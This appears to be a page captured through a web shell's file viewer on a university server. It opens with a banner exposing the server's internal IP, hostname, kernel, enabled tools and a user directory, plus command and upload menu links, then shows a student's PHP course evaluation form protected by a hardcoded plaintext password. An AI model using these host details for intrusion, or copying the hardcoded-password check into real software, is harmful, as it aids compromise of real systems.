Server IP : 172.16.15.8 / Your IP : 18.225.175.230 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jgrayman/www/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php session_start(); $pass = $_SESSION['psw']; if($pass != "project") print "Go away."; else { ?> <center> <h3> Evaluation Form </h3> <HR> </center> <form action="CourseEvalTable5.php" method="post"> <font size=6> Please input the following information: <HR> </font> <p> Course: <INPUT type=text name=course> <p> Gender: <INPUT type=radio name=gender value=male> Male <INPUT type=radio name=gender value=female> Female <p> Class: <INPUT type=radio name=class value=freshman> Freshman <INPUT type=radio name=class value=sophomore> Sophomore <INPUT type=radio name=class value=junior> Junior <INPUT type=radio name=class value=senior> Senior <p> How well was the professor prepared: <INPUT type=radio name=proprep value=0> Poor <INPUT type=radio name=proprep value=1> Average <INPUT type=radio name=proprep value=2> Good <p> Rate the student participation: <INPUT type=radio name=stupar value=0> Poor <INPUT type=radio name=stupar value=1> Average <INPUT type=radio name=stupar value=2> Good <p> Rate the course overall: <INPUT type=radio name=overall value=0> Poor <INPUT type=radio name=overall value=1> Average <INPUT type=radio name=overall value=2> Good <p> <INPUT type="submit" value="Submit Form"> <INPUT type="reset" value="Reset Form"> <font size="2"> <center> <A HREF=index.html> Home </A> | <A HREF=CourseEvalHomePage5.php> Project Home </A> | <A HREF=EvalForm5.php> Evaluation </A> | <A HREF=CourseEvalTool5.php> Table </A> </font> </center> </form>